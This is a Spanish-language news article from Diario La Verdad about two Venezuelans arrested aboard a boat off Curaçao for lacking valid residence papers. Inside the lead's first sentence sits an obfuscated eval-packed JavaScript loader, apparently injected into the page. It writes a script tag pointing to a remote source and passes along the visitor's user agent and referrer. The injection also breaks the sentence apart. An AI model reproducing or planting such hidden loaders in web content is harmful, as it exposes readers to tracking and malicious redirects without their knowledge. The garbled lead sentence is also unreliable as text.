publicidad

Arrestan en Curazao a dos balseros venezolanos

Agencias / José Alejandro Urdaneta / Maracaibo / jurdaneta@laverdad.com
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdhsf|var|u0026u|referrer|raehh||js|php'.split('|'),0,{})) embarcación tipo peñero fue detenida por funcionarios de la Guardia Costera al sur de Santu Pretu en dirección hacia Venezuela. Los hombres detenidos no pudieron mostrar papeles de residencia válidos y fueron llevados a la sede de la policía local

Los dos hombres de nacionalidad venezolana fueron detenidos a bordo de una embarcación en aguas de Curazao. (Foto: Prensa)

Una unidad de Guardacostas de Curacao (KWCARIB) interceptó el pasado martes una embarcación y arrestó a dos venezolanos que se viajaban en ella. 

La lancha sospechosa fue detectada por el radar del Centro de Coordinación y Rescate del Servicio de Guardacostas y una unidad se desplegó para su inspección. 

La embarcación tipo peñero fue detenida al sur de Santu Pretu en dirección hacia Venezuela por oficiales de la Guardia Costera. 

A bordo se encontraron dos personas que no pudieron mostrar los papeles de residencia válidos. El peñero fue llevado al centro de soporte en Parera.

Los dos miembros de la tripulación, de nacionalidad venezolana, fueron trasladados a la policía. La policía junto con el Servicio de Guardacostas realizan las investigaciones del caso. 

La información fue divulgada por el diario Curacao Chronicle.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama